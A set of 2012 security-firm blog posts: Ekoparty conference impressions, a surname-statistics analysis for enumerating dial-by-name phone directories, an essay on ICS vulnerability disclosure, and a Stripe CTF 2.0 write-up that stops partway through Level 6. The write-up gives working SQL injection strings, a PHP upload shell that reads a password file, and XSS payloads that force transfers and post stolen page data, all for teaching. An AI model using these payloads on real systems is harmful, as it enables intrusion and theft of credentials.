INSIGHTS | October 2, 2012

Impressions from Ekoparty

Another ekoparty took place in Buenos Aires, Argentina, and for a whole week, Latin America had the chance to meet and get in touch with the best researchers in this side of the world.
A record-breaking number of 150 entries were received and analysed by the excellent academic committee formed by Cesar Cerrudo, Nico Waisman, Sebastian Muñiz, Gerardo Richarte, Juliano Rizzo.
There were more than 1500 people who enjoyed of 20 talks without any interruption, except when the Mariachis played.
Following last year’s ideas, when ekoparty became the last bastion of resistance to rebellion against machines, this resistance had to move out of the earth to fight the battle of knowledge sharing in another world.
IOActive again accompanied us with all their research team with an excellent stand that included a bartender and a bar throughout the event. IOActive went for more and also sponsored the VIP dinner to honor all exhibitors, organizers and sponsors, who accepted the challenge: Argentine asado vs. Tacos, prepared by their own research team. It was a head-to-head contest, but the advantage was that the meat was from Argentina 🙂


We would like to thank all the researchers, participants, sponsors that contribute to ekoparty’s growth! See you back next year to find out how this story goes on!

By Jennifer Steffens @securesun

For those who know me, I’m no stranger to the world of conferences and have attended both big and small cons around the world. I love experiencing the different communities and learning how different cultures impact the world of security as a whole. I recently had the pleasure of attending my second Ekoparty in Buenos Aires with IOActive’s Latin American team and it was again one of my all time favorites.

To put it simply, I am blown away by both the conference and the community. Francisco, Federico and crew do an amazing job from start to finish. The content is fresh and innovative. They offer all the great side acts that con attendees have grown to love – CTF, lock picking stations, giant robots with lasers, a computer museum as well as the beloved old school Mario Brothers game. Even the dreaded vendor area is vibrant and full of great conversations – as well as a bit of booze thanks to both our bar service and Immunity’s very tasty beer!

But the real heart of Ekoparty is the community. The respect and openness that everyone brings to the experience is refreshing and gives the conference a very “family-like” feel – even with 1500 people. I met so many interesting people and spent each day engaged in inspiring conversations about the industry, the culture and of course, how to be a vegetarian in Argentina (not easy AT ALL!).

A special thanks to Federico and Francisco for the invitation and generous VIP treatment throughout the week. It was a great opportunity for us to bring IOActive’s Latin American team together, which now includes 12 researchers from Argentina, Brazil, Colombia and Mexico; as well as meet potentially new “piratas” in the making. I am amazed every day at what that team is able to accomplish and am already looking forward to Ekoparty 2013 with an even bigger team of IOActive “piratas” joining us.

¡Gracias a los organizadores, speakers y asistentes de la Ekoparty 2012. La semana fue fantástica y espero verlos el año que viene!


By Cesar Cerrudo @cesarcer


This was my 5th time presenting in Ekoparty (I just missed one Ekoparty when my son was born 🙂), Ekoparty is one of my favorites conferences, I feel like a part of it, it’s on my own country which makes it special for me. It’s nice to get together with all the great Argentinean hackers, which by the way are very good and many, and with a lot of friends and colleagues from around the world. During all these years I have seen the growth in quality and quantity, I can say that this conference is currently at the same level that the big and most known ones and every year gets better.


This year I had the honor to give the aperture keynote “Cyberwar para todos”  where I presented my thoughts and views on the global Cyberwar scenario and encourage people to research the topic and get their own thoughts and conclusions.


We sponsored a VIP dinner where speakers, sponsors and friends enjoyed a great night with some long awaited Mexican tacos! Also we had a nice booth with free coffee service in the morning and open bar after noon, I don’t think it’s necessary to stress that it was a very, very popular booth 🙂


The talks were great and there was lot of research presented for the first time at Ekoparty, just take a look at recent news and you will see that this is not just “another“ conference. Last time I remember a security/hacking conference got so many related news was Black Hat/Defcon. We could say Ekoparty is becoming one of the most important world security/hacking conferences.


 By Stephan Chenette @StephanChenette

OK I’ll try my best to follow Cesar, this years keynote speaker, Francisco, one of the founders of EkoParty and Jennifer our CEO in giving an impression of the EkoParty conference. If you haven’t been to EkoParty, stop what you’re doing right now, check out the web site ( and set yourself a reminder to buy a plane ticket and a entry ticket for next year – because this is a con worth attending. If nothing else you’ll learn or confirm what you had thought for years: that the Latin American hacker community is awesome and you should be paying attention to their research if you haven’t been already.

Three days long, EkoParty is compromised of a CTF, Lock picking area, training, and 20 interesting talks on research and security findings. The venue is something you’d expect from CCC or PH-Neutral: An Industrial, bare-bones building loaded up with ping pong tables and massive computing power with no shortness of smoke machines, lights and crazy gadgets on stage…oh and as you read above in Francisco’s summary, a Mariachi band (hey, it is Argentina!).

The building reminded me of the the elaborate Farady cage Gene Hackman had set up in the movie Enemy of the State that was used to hide from the CIA. Except Eko Party was filled with around 1500 attendees and organizers.




IOActive sponsored a a booth and tried their best to provide the attendees with as much quality alcohol as possible =] 

Our booth is where I spent most of my time when not seeing talks, so that I could hang out with IOActive’s Latin American team members originating from Mexico, Brazil, Colombia and Argentina.

I saw a number of talks while at EkoParty, but I’m sure most of you will agree the three most noteworthy talks were:
    • CRIME (Juliano Rizzo and Thai Doung)


    • Cryptographic Flaws in Oracle Database Authentication Protocol (Esteban Fayo)


    • Dirty use of USSD Codes in Cellular Network (Ravi Borgaonkar)


I won’t go into details on the above talks, as more information is now available online about them.
I was lucky enough to be accepted as as speaker this year and talk on research focused around defeating network and file-system detection. My past development experience is on detection of threats, but as I stated in my presentation: You must think offensively when creating defensive technology and make no mistake of overselling it’s limitations – a problem most salespeople at security companies have these days.
I spent about 75% of my time reviewing various content detection technologies from the last 20 years and explaining each one of their limitations. I then talked about the use of machine learning and natural language processing for both exploit and malware  detection as well as attribution. 
Machine learning like any technology used in defense, has it’s limitations and I tried to explain my point of view and importance of not only having a layered defense, but having a well thought  out layered defense that makes sense for your organization. 
As I stated in my presentation, attackers have several stages they typically go through to pull off a full attack and successfully ex-filtration data:


    • Recon (Intelligence gathering)


    • Penetration (exploitation of defenses)


    • Control (staging a persistent mechanism within the network)


    • Internal Recon


    • Ex-filtration of data


In my presentation I looked at the reality in offensive techniques against detection technologies: Attackers are going to stay just enough ahead of the defense curve to avoid detection.


(Stephan Chenette’s presentation on
“the Future of Automated Malware Generation”)
For example with Gauss and Zeus we’ve seen dlls being encrypted with a key only found on the targeted machine and downloaded binaries encrypted with information from the infected host – FYI – encrypting binaries with target information basically kills the possibility of any behavior sandbox from being able to run the binary outside of it’s intended environment.
So maybe attackers of the future will only make incremental improvements to thwart detection OR maybe we’ll start seeing anti-clustering and anti-classifications added to the attacker’s arsenal as machine learning is added as another layer of defense – The future is of course unknown – but I do have my suspicions.
In my concluding slides I stressed that there is much improvement that can be made on the side of detecting the threat before it happens as well as making sure that a defensive strategy should be layered in a manor that focuses on making the attacker spend, time, resources and different skill levels at each layer, hopefully comprising enough of his or herself in the process and giving the targeted organization enough time to mitigate the threat if not halt the attack all together.
This was by far the largest crowd I’ve ever spoken in front of and goes down as one of the best conferences I’ve attended. Thanks again EkoParty committee for inviting me to present, I’ll try my best to be back next year!!

By Ariel Sanchez


We had the opportunity at the Ekoparty to attend  presentations which a show high level of innovation and creativity.


Here are some personal highlights:


 *The CRIME Attack presentation by Juliano Rizzo and Thai Doung


 *Trace Surfing presentation by Agustin Gianni


 *Cryptographic flaws in Oracle Database authentication protocol presentation by Esteban Fayo


I can’t wait to see what is coming in the next ekoparty!



By Tiago Assumpcao @coconuthaxor


If my memory is accurate, this was my fourth EkoParty. From the first time to now, the numbers related to the conference have grown beyond my imagination. On the other hand, EkoParty remains the same on another aspect: it has the energetic blood of Latin American hackers. Too many of them, actually. Buenos Aires has a magical history of popping up talents like nowhere else. And the impressive numbers and quality of EkoParty, today, definitely have to do with that magic.


There were many great talks, on a wide range of topics. I will summarize the ones I mostly appreciated, being forced to leave aside the ones I didn’t have the chance to catch.


Cyberwar para todos, I’ve seen people complaining about this topic, either because it’s political (rather than technical), or because “it’s been too stressed” already. In my opinion, one can’t ignore how the big empires think of information security. Specifically, here is what I liked about this talk: the topic might have been stressed in North America, but the notion of cyberwar, per Gen. Keith Alexander’s vision, is still unknown to most in South America. A few years ago, the Brazilian CDCiber (Cyber Defense Centre) was created and, despite effort coming directly from the President, the local authorities are still very naïve, to say least, if compared to their rich cousins. Cesar raises questions about that.


Satellite baseband mods: Taking control of the InmarSat GMR-2 phone terminal, this was probably my favorite talk. They showed how a user can easily modify satellite phones at will, poking data that comes in and out of the device. Furthermore, the presenters showed how communication technologies very similar to GSM, when applied over a different medium, can open whole new vectors of potential attacks. Finally, Sebastian “Topo” Muniz is one of the most hilarious speakers in the infosec industry.


Trace Surfing, this is one of those rare talks that resolve hard problems with very simple solutions. Agustín showed how one can retrieve high-level information about the Windows heap, during the course of an execution trace, simply by tracking ABI specifics at call-sites of choice. The simplicity of his solution also makes it really fast. Great work!


PIN para todos (y todas), basically Pablo Sole created an interface that allows one to write Pin-based tools to instrument JavaScript. I heard it’s impressively fast.


What I really wanted to have seen, but couldn’t…


OPSEC: Because Jail is for wuftpd, unfortunately, they had Grugq speaking at 9am. I can’t digest humour so early and will have to ask him for a secondhand presentation.


Literacy for Integrated Circuit Reverse Engineering, very sadly, I didn’t catch Alex’s presentation. But if you are into reverse engineering modern devices, I would recommend it with both my eyes closed, nonetheless.



By Lucas Apa @lucasapa

What begun publicly as an e-zine in the early century now arises as the most important latin american security conference “ekoparty”. All the latin american team landed Buenos Aires to spend an amazing week.
My “ekoparty week” started on monday where I got invited to attend a “Malware Analysis Training” by ESET after solving a challenge of “binary unpacking” posted on their blog. First, two intensive days were held with paid trainings which covered the following topics: cracking, exploiting, sap security, penetration testing,  web security, digital forensics and threats defense. Every classroom was almost fully booked.

The conference started on Wednesday in “Konex Cultural Center”, one of the most famous cultural centers especially for music and events. The building used to be an oil factory some decades ago.
On Wednesday, our CTO Cesar Cerrudo, was the main keynote of the day.
Many workshops were open for any conference assistant for the rest of the day.

At night we enjoyed a classic “Mexican Grill” at IOActive’s party where VIP guests were invited. The meal was brought you by Alejandro Hernández and Diego Madero, our Mexican Security Consultants.
On Thursday and Friday were the most awaited days since the presentations were going to start.

My favorite talks were:

*Taking control of the InmarSat GMR-2 phone terminal (Sebastian Muñiz and Alfredo Ortega): Without modifying the firmware image, researchers managed to send AT commands to the phone terminal to write arbitrary memory. They copied binary instrumentation code for logging and hooking what really sends the phone on common actions like sending SMS. Then, they wrote the “data” section for redirecting the flow at some point and discovered that messages sent to the satellite “might” be vulnerable to
“memory corruption” if they are preprocessed by the satellite before retransmision. No satellites were harmed.

*VGA Persistent Rootkit (Nicolás Economou and Diego Juarez): Showed a new combo of techniques for modifing reliably the firmware of a VGA card to execute code or add new malicious basic blocks.

*The Crime (Juliano Rizzo and Thai Duong): The most awaited talk revealed a new chosen plaintext attack where compression allowed to recognize which secuences of bytes were already on the TLS data. The attack works like BEAST, with two requirements: capture encrypted victim’s traffic and control his browser by using a web vulnerability (or MITM on an HTTP service). When forcing the browser to issuing some specific words on the HTTP resource location, they figured that if that portion of the random string is already on the cookie the TLS data gets more compressed. This allows to bruteforce to identify the  piggybacked cookie that is automatically added to the request.

*The Future of Automated Malware Generation (Stephan Chenette): Our Director of R&D showed how different AV’s performs approaches for detecting malware mostly failing. It is difficult to defend ourselves in something we dont know but we must remember that attackers are also having fun with Machine Learning too !

*Cryptographic flaws in Oracle DB auth protocol (Esteban Fayó): When authenticating a user, Oracle uses the hashed password (on the database) as the key for encrypting the server session (random). The user hashes its password and then tries to decrypt the encrypted session that the server returned. The problem is that is possible to recognize if this decryption returns an invalid padding so the initial password can be tried offline. This allows to bruteforce the process of decrypting locally till a valid padding occurs (sometimes it colides with a valid padding but it’s not actually the password). This vulnerability was
reported to Oracle 2 years ago but no patch was provided by them till then.


By Alejandro Hernández @nitr0usmx


After a 10 hours delayed flight, finally I landed to Buenos Aires. As soon as I could, I went straight to the VIP party to meet with the IOActive team and to prepare some mexican tacos and quesadillas (made by Diego Bauche @dexosexo).


The next day, Thursday, I had the chance to be at the Stephan Chanette’s talk (@StephanChenette), which was a really interesting presentation about automated malware generation and future expectations. His presentation had a good structure because he started with the current state of malware generation/defense and later he explained the future of malware generation/defense passing through the actual malware trends. The same day, I enjoyed the Esteban Fayo’s talk (@estemf) because he showed a live demo on how to crack an Oracle password taking advantage of some flaws in the Oracle authentication protocol.


The venue, KONEX, the same as the last year, was really cool, there were vendors booths, old computers, video games (where I spent like two hours playing Super Mario Bros) as well as a cocktail bar, obviously the IOActive booth ;).


In conclusion, I really had a great time with my fellow workers, drinking red wine and argentine asado, besides amazing conferences.


Definitely, I hope to be there the next year.
INSIGHTS | September 26, 2012

Completely Unnecessary Statistical Analysis: Phone Directory

Disclaimer: I am not a statistician.


A particular style of telephone company directory allows callers to “dial by name” to reach a person, after playing the matching contacts’ names.  In the example used here, input must be given as surname + given name with a minimum of three digits using the telephone keypad (e.g. Smith = 764). To cover all possible combinations, you’d calculate 8^3, or 512 combinations. With a directory that allowed repeated searches in the same call, it would take about seven hours of dialing to cover all possible combinations.


Let’s use available data to try and reduce the complexity of the problem while increasing the return on effort – like the giant nerds we are.


The 2000 U.S. Census provided raw data[1] on over 150,000 surnames occurring 100 or more times in the population. This puts the lowest occurrence of a surname in the data at 1 in 2,500,000. The uncounted surnames[2] represent 10.25% of people counted in the 2000 Census. This means our data only cover 89.75%* of the U.S. population, but we can safely assume† that the remaining names closely follow the patterns established in the data we do have available.


In this analysis, the first three characters of each surname in the Census data were converted into a three-digit combination using a telephone keypad conversion function. The resulting data were manipulated using an Excel pivot table to group matching combinations and sum the percentage of occurrence. This resulted in a table that ranked each combination. To facilitate the creation of interactive charts, this data was then imported into a Google Spreadsheet[3].


Results Summary




Unsurprisingly, the distribution of surnames for the patterns is non-uniform, with favorable spikes. Sorting by rank, we find the best pattern – 227 – should return 2% of the surnames for the average U.S. company. What’s more exciting is that we can use a smaller amount of effort to achieve a larger than expected amount of results. Searching by ascending rank to return 50% of the surnames, you only need to search 67 patterns, which is 13% of all possible combinations. To return 90% of the surnames you only need to search 241 patterns, which is 47% of all possible combinations. Some milestones are listed in the chart below.






The following chart shows the curvilinear relationship of the expected returns versus the  effort expended.




Test Case
A test case was performed against an actual U.S. company phone directory, with a medium-sized population that happened to be highly biased to Polish surnames. Approximately 120 names were “randomly” selected based on a known list of employees and the patterns for each were searched. In spite of the bias, the test case correlated well with the expected results.


The highest number of surnames (6) was returned by pattern 627 (3rd Rank), the second highest number of surnames (5) was returned by pattern 227 (1st Rank) and the fourth highest number of surnames (3) was returned by pattern 726 (5th Rank). These three data points average to estimate a total population of 300, which is close to the expected size of the company.


The U.S. Census includes racial data, which may be helpful in tailoring to certain populations, but surnames by state would be more helpful, which do not appear to be available. A geographic breakdown could improve results in the test case.


Notable Facts
·         Three patterns do not appear in this data: 577, 957, 959.


·         Sorted by rank, the last 10% of surnames require 53% of the effort.


·         Surname data from the 2010 Census was not compiled and is not available.


·         Unlike the U.S., Canada has a large population of 2-letter surnames[4].


·         Canada’s government does not release surname data.


Get The Full List


Thanks to Nick Roberts of Foundstone for supplying a Canadian point of view on the subject.


*  Two-letter surnames were excluded. This reduces the coverage of the analysis by 0.25% to 89.50% of the total population, a negligible change. Since entering these surnames would require the first letter of the given name, these should be analyzed separately for the distribution of given names, with some consideration to the biases of ethnicity. The U.S. Census does not consider surnames with one character valid.


†  Some references in this document extrapolate the Census data to include 100% of the population for clarity. The spreadsheet[4] available lists percentages of both the sample data and the population as a whole for accuracy.

INSIGHTS | September 11, 2012

Malware Doesn’t Care About Your Disclosure Policy, But You Better Have One Anyway

All over the world, things are changing in ICS security—we are now in the spotlight and the only way forward is, well, forward. Consequently, I’m doing more reading than ever to keep up with technical issues, global incidents, and frameworks and policies that will ensure the security of our future.

From a security researcher’s perspective, one exciting development is that .gov is starting to understand the need for disclosure in some cases. They have found that by giving companies lead time to implement fixes, they often get stonewalled for months or years. Yes, it sometimes takes years to fix specific ICS security issues, but that is no excuse for failing to contact the researcher and ICS-CERT with continually-updated timelines. This is well reflected in the document we are about to review.

The Common Industrial Control System Vulnerability Disclosure Framework was published a bit before BlackHat/Defcon/BSideLV, and I’ve just had some time to read it. The ICSJWG put this together and I would say that overall it is very informative.

For example, let’s start with the final (and most blogged about) quote of the Executive Summary:

“Inconsistent disclosure policies have also contributed to a public perception of disorganization within the ICS security community.”

I can’t disagree with that—failure to have a policy already has contributed to many late nights for engineers.

On Page 7, we see a clarification of vulnerabilities found during customer audits that is commendable:

“Under standard audit contracts, the results of the audit are confidential to the organization customer and any party that they choose to share those results with. This allows for information to be passed back to the vendor without violating the terms of the audit. The standard contract will also prevent the auditing company from being able to disclose any findings publically. It is important to note however, that it is not required for a customer to pass audit results on to a vendor unless explicitly noted in their contract or software license agreement.”

Is there a vendor who explicitly asks customers to report vulnerabilities in their license agreements? Why/why not?

On Page 9, Section 5 we find a dangerous claim, one that I would like to challenge as firmly and fairly as I can:

“Not disclosing an issue is not discussed; however it remains an option and may be appropriate in some scenarios.”

Very, well. I’m a reasonable guy whose even known to support responsible disclosure despite the fact it puts hand-cuffs on only the good guys. Being such a reasonable guy, I’m going to pretend I can accept the idea that a company selling industrial systems or devices might have a genuine reason to not disclose a security flaw to its customers. In the spirit of such a debate, I invite any vendor to comment on this blog post with a hypothetical scenario in which this is justified.

Hypothetically speaking: When is it appropriate to withhold vulnerabilities and not disclose them to your ICS customers?

While we’re at it, we also see the age-old disclosure always increases risk trope again, here:

“Public Disclosure does increase risk to customers, as any information disclosed about the vulnerability is available to malicious individuals as well as to legitimate customers. If a vulnerability is disclosed publically prior to a fix being made available, or prior to an available fix being deployed to all customers, malicious parties may be able to use that information to impact customer operations.”

Since I was bold enough to challenge all vendors to answer my question about when it is appropriate to remain silent, it’s only fair to tackle a thorny issue from the document myself. Imagine you have a serious security flaw without a fix. The argument goes that you shouldn’t disclose it publicly since that would increase the risk. However, what if the exploit were tightly constrained and detectable in 100% of cases? It seems clear that in this case, public disclosure gives the best chance for your customers to DETECT exploitation as opposed to waiting for the fix. Wouldn’t that DECREASE risk? Unfortunately, until you can measure both risk and the occurrence of 0-day vulnerabilities in the wild RELIABLY, this is all just conjecture.

There exists a common misconception in vulnerability management that only the vendor can protect the customer by fixing an issue, and that public disclosure always increases risk. With public disclosure, you widen the circle of critical and innovative eyes, and a third party might be able to mitigate where the vendor cannot—for example, by using one of their own proprietary technologies.

Say, for example, that a couple of ICS vendors had partnered with an Intrusion Detection and Prevention system company that is a known defender of industrial systems. They could then focus their early vulnerability analysis efforts on detecting and mitigating exploits on the wire reliably before they’re even fixed. This would reduce the number of days after zero the exploit can’t be detected and, to my thinking, that reduces the risk. I’m disappointed that—in the post-Stuxnet era—we continue to have ICS disclosure debates because the malware authors ultimately don’t even care. I can’t help but notice that recent ICS malware authors weren’t consulted about their “disclosure policies” and also didn’t choose to offer them.

As much as I love a lively debate, I wanted to commend the ICSJWG for having the patience to explain disclosure when the rest of us get tired.

INSIGHTS | August 29, 2012

Stripe CTF 2.0 Write-Up

Hello, World!

I had the opportunity to play and complete the 2012 Stripe CTF 2.0 this weekend. I would have to say this was one of the most enjoyable CTF’s I’ve played by far.  They did an excellent job. I wanted to share with you a detailed write-up of the levels, why they’re vulnerable, and how to exploit them. It’s interesting to see how multiple people take different routes on problems, so I’ve included some of the solutions by Michael Milvich (IOActive), Ryan O’Horo(IOActive), Ryan Linn(Spiderlabs), as well as my own (Joseph Tartaro, IOActive).
I hope this write-up gives you guys the opportunity to learn something new or get a better understanding of how I  approached this CTF. I’ve included all the main source code that was available at the information page of each level, even if it was unnecessary, just so people could see it all if they were interested. If you have any further questions you should feel free to e-mail me at Joseph.Tartaro[at]ioactive[dot]com, or make a comment below.
Lets get started!
Level 0  –  SQL Injection
Level 1  –  Misuse of PHP Function on Untrusted Data
Level 2  –  File Upload Vulnerability
Level 3  –  SQL Injection
Level 4  –  XSS/XSRF
Level 5  –  Insecure Communication
Level 6  –  XSS/XSRF
Level 7  –  SHA1 Length-Extension Vulnerability
Level 8  –  Side Channel Attack
Source Code 

Level 0:

Welcome to Capture the Flag! If you find yourself stuck or want to learn more about web security in general, we’ve prepared a list of helpful resources for you. You can chat with fellow solvers in theCTF chatroom (also accessible in your favorite IRC client atirc://
We’ll start you out with Level 0, the Secret Safe. The Secret Safe is designed as a secure place to store all of your secrets. It turns out that the password to access Level 1 is stored within the Secret Safe. If only you knew how to crack safes
You can access the Secret Safe at The Safe’s code is included below, and can also be obtained via git clone

So quickly looking at the code, the main areas we’re interested in are right here ….


sqlite3 = require('sqlite3'); // SQLite (database) driver


  if (namespace) {
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
             if (err) throw err;

renderPage(res, {namespace: namespace, secrets: secrets});

We can see that it’s querying the SQL database with our user-supplied input. We also know that it is an sqlite3 database. When looking at the SQL statement, we can see that it’s using the LIKE operator, which happens to have a wildcard character (%). When we supply the wildcard character, it will respond with all the secrets in the database.

Level 1:

Excellent, you are now on Level 1, the Guessing Game. All you have to do is guess the combination correctly, and you’ll be given the password to access Level 2! We’ve been assured that this level has no security vulnerabilities in it (and the machine running the Guessing Game has no outbound network connectivity, meaning you wouldn’t be able to extract the password anyway), so you’ll probably just have to try all the possible combinations. Or will you…?
You can play the Guessing Game at The code for the Game can be obtained fromgit clone, and is also included below.
So quickly looking at the code, here’s the block we’re interested in….
      $filename = 'secret-combination.txt';
      if (isset($attempt)) {
        $combination = trim(file_get_contents($filename));
        if ($attempt === $combination) {
          echo "<p>How did you know the secret combination was" .
               " $combination!?</p>";
          $next = file_get_contents('level02-password.txt');
          echo "<p>You've earned the password to the access Level 2:" .
               " $next</p>";
        } else {
          echo "<p>Incorrect! The secret combination is not $attempt</p>";
So let’s step through the code and see what’s happening:
    • creates $filename storing ‘secret-combination.txt’
    • extract $_GET (all GET parameters supplied by the user)
    • if $attempt is set:
    • declare $combination with the trim()’d contents of $filename
    • if $attempt and $combination are equal
      • print contents of ‘level02-password.txt’
    • else
      • print incorrect
So let’s look at what extract() is actually doing…



int extract ( array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]] )
Import variables from an array into the current symbol table.
Checks each key to see whether it has a valid variable name. It also checks for collisions with existing variables in the symbol table.
If  extract_type  is not specified, it is assumed to be  EXTR_OVERWRITE.
Well, look at that, they didn’t specify an extract_type, so by default it is EXTR_OVERWRITE, which is,  “If there is a collision, overwrite the existing variable.”
There was even a nice little warning for us,
Do not use extract() on untrusted data, like user input (i.e. $_GET$_FILES, etc.).
So now looking back at the code, we can see that they declare $filename before they use extract(), so this gives us the opportunity to create a collision and overwrite the existing variable with our GET parameters.

In simple terms, it will create variables depending on what you supply in your GET request. In this case we can see that our request /?attempt=SECRET creates a variable $attempt that stores the value “SECRET”, so we could also send ”/?attempt=SECRET&filename=random_file.txt”. The extract() will now overwrite their original $filename with our supplied value, ”random_file.txt”.

So what can we do to make these match? You see how $combination is storing the result of file_get_contents() for the $filename, then using trim() on it. If file_get_contents() returns false due to a file not existing, trim() will then return an empty string. So if we supply a file that does not exist and an empty $attempt, they will match…
So let’s supply:

Level 2:

You are now on Level 2, the Social Network. Excellent work so far! Social Networks are all the rage these days, so we decided to build one for CTF. Please fill out your profile at You may even be able to find the password for Level 3 by doing so.
The code for the Social Network can be obtained from git clone, and is also included below.
So, this one is pretty simple. The areas we’re interested in are:

$dest_dir = "uploads/";


<form action="" method="post" enctype="multipart/form-data">
   <input type="file" name="dispic" size="40" />
   <input type="submit" value="Upload!">
   Password for Level 3 (accessible only to members of the club):
   <a href="password.txt">password.txt</a>

Looking at this, we have an ‘uploads’ directory that that we can access, and a form that we can use to upload images. They have no security in place to check for file-specific file extensions at all. Let’s try uploading a file, but not an image–a php script.
$output = shell_exec(‘cat ../password.txt’);
echo “<pre>$output</pre>”;
Then just browse to the /uploads/ dir and click on your uploaded php file.

Level 3:

After the fiasco back in Level 0, management has decided to fortify the Secret Safe into an unbreakable solution (kind of like Unbreakable Linux). The resulting product is Secret Vault, which is so secure that it requires human intervention to add new secrets.
A beta version has launched with some interesting secrets (including the password to access Level 4); you can check it out at As usual, you can fetch the code for the level (and some sample data) via git clone, or you can read the code below.

Ok, so let’s look at some important parts. We know it’s sqlite3 again and how it is setup:

# CREATE TABLE users (
#   username VARCHAR(255),
#   password_hash VARCHAR(255),
#   salt VARCHAR(255)
# );
    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)

res = cursor.fetchone()
if not res:
return There’s no such user {0}!n.format(username)
user_id, password_hash, salt = res

calculated_hash = hashlib.sha256(password + salt)
if calculated_hash.hexdigest() != password_hash:
return That’s not the password for {0}!n.format(username)

So we can see that the statement is using our supplied username, which has an SQL injection of course. They’re selecting the id, password_hash, and salt from users where the username equals our input. Let’s load up our own sample database, make some test queries and, see what happens….

sqlite> insert into users values (“myid”, “myusername”, “0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60”, “SUPER_SECRET_SALT”);
sqlite> select id, password_hash, salt FROM users where username = ‘myusername’;
 So, let’s do a union select after and supply exactly what we would like back.
sqlite> select id, password_hash, salt FROM users where username = ‘myusername’ union select ‘new id’, ‘new hash’, ‘new salt’;
new id|new hash|new salt

As you can see, by using a union select we can define in the content of the response. The ‘new id’, ‘new hash’, and ‘new salt’ was in our response. After looking at the code when it does the compare, we can see that it does a sha256(password + salt) and compares it to what was in the response for the sql statement.

Let’s supply our own hash and compare them to each other!
>>> import hashlib
>>> print hashlib.sha256(“lolpassword” + “lolsalt”).hexdigest()
We just created our new sha256 hash with the salt ‘lolsalt’; let’s now submit our new hash injection into the SQL statement.

username: z’%20union%20select%20’1′,’dbb4061dc0dd72027d1c3a13b24f17b01fb163037211192c841a778fa2bba7d5′,’lolsalt


The code will now take the password you submitted, hash it with the salt returned from the sql query, then compare it to the hash that was in the response (the salt and hashes that are in the response were the ones we supplied in our injection). This will lead to them matching and you receiving a message similar to this:
Welcome back! Your secret is: “The password to access level04 is: aZnRbEpSfX” (Log out)

Level 4:

The Karma Trader is the world’s best way to reward people for good deeds: You can sign up for an account, and start transferring karma to people who you think are doing good in the world. In order to ensure you’re transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.
The very active user karma_fountain has infinite karma, making it a ripe account to obtain (no one will notice a few extra karma trades here and there). The password for karma_fountain‘s account will give you access to Level 5.
You can obtain the full, runnable source for the Karma Trader fromgit clone We’ve included the most important files below.
This is a nice little XSS/XSRF challenge. The goal here is to get that karma_fountain to send you some karma, which in turn will let you view their password.
 When registering a new account, you can insert malicious code into the password field, which will then be displayed once you send someone karma because the application is designed to show users your password once they receive karma.
In this situation they’re including JQuery, so it makes our lives even easier when trying to make requests. The idea is to inject some malicious code into the karma_fountains page that will automatically make them transfer you some karma.
I went and created a new user named ‘whoop’ with the password:
‘<script>$.post(“transfer”, { to: “whoop”, amount: “2” } );</script>’
So, now that you can login, send some karma to the karma_fountain and wait… eventually the karma_fountain user will view their page and your injected code will force them to transfer karma to the user ‘whoop’.
Refresh your page until you can view karma fountain’s password on the right.

Level 5:

Many attempts have been made at creating a federated identity system for the web (see OpenID, for example). However, none of them have been successful. Until today.
The DomainAuthenticator is based off a novel protocol for establishing identities. To authenticate to a site, you simply provide it username, password, and pingback URL. The site posts your credentials to the pingback URL, which returns either “AUTHENTICATED” or “DENIED”. If “AUTHENTICATED”, the site considers you signed in as a user for the pingback domain.
You can check out the Stripe CTF DomainAuthenticator instance here: We’ve been using it to distribute the password to access Level 6. If you could only somehow authenticate as a user of a level05 machine…
To avoid nefarious exploits, the machine hosting the DomainAuthenticator has very locked down network access. It can only make outbound requests to other servers. Though, you’ve heard that someone forgot to internally firewall off the high ports from the Level 2 server.
Interesting in setting up your own DomainAuthenticator? You can grab the source from git clone, or by reading on below.
So, this problem is just… insecure communication in general. There are a couple of issues here.
This  code block checks to see if it was a POST but doesn’t check if parameters supplied were on the GET or POST lines:
    post '/*' do
      pingback = params[:pingback]
      username = params[:username]
      password = params[:password]
This is an insecure way of checking if we’re Authenticated…
    def authenticated?(body)
      body =~ /[^w]AUTHENTICATED[^w]*$/
There are multiple ways of clearing this level…but Ryan O’Horo showed me his route, which was the cleanest one out of the four we tried. The whole idea is to get it to match the Authenticated regex, but on a host of level5-*
So…the easiest route….
POST /user-smrqjnvcis/?username=root&pingback= HTTP/1.1
The pingback URL contains a newline (%0A) so that the regular expression’s end-of-line marker matches after the word “AUTHENTICATED”, and it must be double-encoded as it’s nested in the original pingback parameter
This will make the application do a pingback on level05 host, but since we included http:// instead of https:// it gave a 302 redirect with the URL . Which the application matched to the response containing the regex and authenticated the user.
I’m not going to bother showing the other routes some of us took… simply because I’m embarrassed that we made it so much harder on ourselves instead compared to the 1 request solution used by Ryan.

Level 6:

After Karma Trader from Level 4 was hit with massive karma inflation (purportedly due to someone flooding the market with massive quantities of karma), the site had to close its doors. All hope was not lost, however, since the technology was acquired by a real up-and-comer, Streamer. Streamer is the self-proclaimed most steamlined way of sharing updates with your friends. You can access your Streamer instance here:
The Streamer engineers, realizing that security holes had led to the demise of Karma Trader, have greatly beefed up the security of their application. Which is really too bad, because you’ve learned that the holder of the password to access Level 7, level07-password-holder, is the first Streamer user.
As well, level07-password-holder is taking a lot of precautions: his or her computer has no network access besides the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and the like.
Fortunately for you, the Streamer engineers have decided to open-source their application so that other people can run their own Streamer instances. You can obtain the source for Streamer at git clone We’ve also included the most important files below.
Ok, so in this level we’re dealing with a unique social network. We have to find a way to view the other user’s user_info page to see their password. If you started posting some of your own posts you would find that it is susceptible to Cross-Site Scripting. So we need to find a way to get the user to view their user_info page, and then post the results so that we can view them.
We are limited to not using the single-quote and double-quote characters (‘ and “), but everything else is pretty much legal, so we can take use of JavaScript’s String.fromCharCode() and once again JQuery! We’ll have to break out of their script tags, then inject our code, but we also need to make sure the code doesn’t launch until the entire page has been loaded. They have a csrf token, but it’s poorly implemented, seeing that we can use the current JavaScript code that’s already on the page. Another issue that you will run into is that the results from the user_info page have characters that are not allowed, so we will escape() the data response before posting it. Here’s the payload that I used before String.fromCharCode:
</script><script>$(document).ready(function() {$.get(‘user_info’, function(data) {document.forms[0].body.value = escape(data); document.forms[0].submit();})});</script><script>//
And here it is after….
